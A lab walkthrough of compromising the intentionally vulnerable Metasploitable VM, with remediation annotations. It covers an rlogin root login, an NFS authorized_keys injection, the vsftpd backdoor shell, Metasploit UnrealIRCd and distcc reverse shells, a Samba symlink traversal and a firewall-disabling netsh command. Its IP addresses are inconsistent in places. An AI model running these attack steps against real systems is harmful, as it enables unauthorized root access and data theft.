

Sistemas vulnerables

msfadmin@metasploitable:~$ ifconfig



  

eth0 Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1 

inet addr:192.168.93.101  Bcast:192.168.99.255  Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link

UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1





nmap -p0-65535 192.168.93.101



Starting Nmap 5.61TEST4 ( http://nmap.org ) 

Nmap scan report for 192.168.93.101

Host is up (0.00028s latency).

Not shown: 65506 closed ports

PORT      STATE SERVICE

21/tcp    open  ftp

22/tcp    open  ssh

23/tcp    open  telnet

25/tcp    open  smtp

53/tcp    open  domain

80/tcp    open  http

111/tcp   open  rpcbind

139/tcp   open  netbios-ssn

445/tcp   open  microsoft-ds

512/tcp   open  exec

513/tcp   open  login

514/tcp   open  shell

1099/tcp  open  rmiregistry

1524/tcp  open  ingreslock

2049/tcp  open  nfs

2121/tcp  open  ccproxy-ftp

3306/tcp  open  mysql

3632/tcp  open  distccd

5432/tcp  open  postgresql

5900/tcp  open  vnc

6000/tcp  open  X11

6667/tcp  open  irc

6697/tcp  open  unknown

8009/tcp  open  ajp13

8180/tcp  open  unknown

8787/tcp  open  unknown

39292/tcp open  unknown

43729/tcp open  unknown

44813/tcp open  unknown

55852/tcp open  unknown

MAC Address: 00:0C:29:9A:52:C1 (VirtualBox)





# rlogin -l root 192.168.93.101

Last login: Fri Ago  1 00:10:39 EDT 2012 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

root@metasploitable:~#

(rlogin on 513/tcp returned a root shell with no password prompt: the r-services trust model is host-based — typically /etc/hosts.equiv or ~/.rhosts — and the session travels in clear text. All three r-services ports (512, 513, 514/tcp) are open in the scan above; disable rexec/rlogin/rsh and use SSH instead.)





root@ubuntu:~# rpcinfo -p 192.168.93.101

   program vers proto   port  service

    100000    2   tcp    111  portmapper

    100000    2   udp    111  portmapper

    100024    1   udp  53318  status

    100024    1   tcp  43729  status

    100003    2   udp   2049  nfs

    100003    3   udp   2049  nfs

    100003    4   udp   2049  nfs

    100021    1   udp  46696  nlockmgr

    100021    3   udp  46696  nlockmgr

    100021    4   udp  46696  nlockmgr

    100003    2   tcp   2049  nfs

    100003    3   tcp   2049  nfs

    100003    4   tcp   2049  nfs

    100021    1   tcp  55852  nlockmgr

    100021    3   tcp  55852  nlockmgr

    100021    4   tcp  55852  nlockmgr

    100005    1   udp  34887  mountd

    100005    1   tcp  39292  mountd

    100005    2   udp  34887  mountd

    100005    2   tcp  39292  mountd

    100005    3   udp  34887  mountd

    100005    3   tcp  39292  mountd



 

root@ubuntu:~# showmount -e 192.168.93.101

Export list for 192.168.93.101:

(The export list itself is not reproduced on this page; the mount that follows treats `/` as exported. Writing into /root/.ssh through the mounted export then succeeds, which implies the export is root-writable from an arbitrary client — i.e. no root_squash. Restrict exports in /etc/exports to named hosts, keep root_squash, and never export `/`. Also note the mount line uses 192.168.99.131 while every other command targets 192.168.93.101 — one of the two is a transcription inconsistency.)





root@ubuntu:~# ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/root/.ssh/id_rsa):

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /root/.ssh/id_rsa.

Your public key has been saved in /root/.ssh/id_rsa.pub.

 

root@ubuntu:~# mkdir /tmp/r00t

root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

root@ubuntu:~# umount /tmp/r00t

 

root@ubuntu:~# ssh root@192.168.93.101

Last login: Fri Ago  1 00:29:33 2012 from 192.168.93.128

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

 

root@metasploitable:~#





root@ubuntu:~# telnet 192.168.93.101 21

Trying 192.168.93.101...

Connected to 192.168.93.101.

Escape character is '^]'.

220 (vsFTPd 2.3.4)

user usuario:)

331 Please specify the password.

pass invalid

^]

telnet> quit

Connection closed.

 

root@ubuntu:~# telnet 192.168.93.101 6200

Trying 192.168.93.101...

Connected to 192.168.93.101.

Escape character is '^]'.

id;

uid=0(root) gid=0(root)

(This shell on 6200/tcp runs as root, and 6200 does not appear in the nmap output above — it only listens after the trigger, so periodic port scans will not surface it. The `220 (vsFTPd 2.3.4)` banner is the reliable indicator of the trojaned build; the fix is to replace it with a clean vsftpd package.)





msfconsole

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf  exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.93.101

msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler

[*] Connected to 192.168.93.101:6667...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] Sending backdoor command...

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo 8bMUYsfmGvOLHBxe;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "8bMUYsfmGvOLHBxe\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.93.101:60257) at 2012-05-31 21:53:59 -0700

 

id

uid=0(root) gid=0(root)





msfconsole

msf > use exploit/unix/misc/distcc_exec

msf  exploit(distcc_exec) > set RHOST 192.168.93.101

msf  exploit(distcc_exec) > exploit

 

[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo uk3UdiwLUq0LX3Bi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "uk3UdiwLUq0LX3Bi\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.93.101:38897) at 2012-05-31 22:06:03 -0700

 

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

(Unlike the previous sessions this one runs as `daemon`, not root, so it is an unprivileged foothold rather than a full compromise. distccd on 3632/tcp should not listen on untrusted interfaces — limit clients with its `--allow` option or firewall the port.)







root@ubuntu:~# smbclient -L //192.168.93.101

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

        Sharename       Type      Comment

        ---------       ----      -------

        print$          Disk      Printer Drivers

        tmp             Disk      oh noes!

        opt             Disk     

        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))

        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))

 

root@ubuntu:~# msfconsole

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf  auxiliary(samba_symlink_traversal) > set RHOST 192.168.93.101

msf  auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf  auxiliary(samba_symlink_traversal) > exploit

 

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*]     \\192.168.93.101\tmp\rootfs\

(The traversal works because the `tmp` share is anonymously writable and the server follows the created symlink outside the share. In smb.conf that is governed by `wide links` and `unix extensions` (set `wide links = no`), and anonymous write access to any share should be removed; the Samba 3.0.20 version in the banner is also long out of support.)

 

msf  auxiliary(samba_symlink_traversal) > exit

 

root@ubuntu:~# smbclient //192.168.93.101/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]



$ netsh advfirewall set allprofiles state off

(This last line is a Windows host command unrelated to the Linux target above; it turns off the Windows Firewall on every profile. If it was run on a lab machine, restore it afterwards with `netsh advfirewall set allprofiles state on`.)





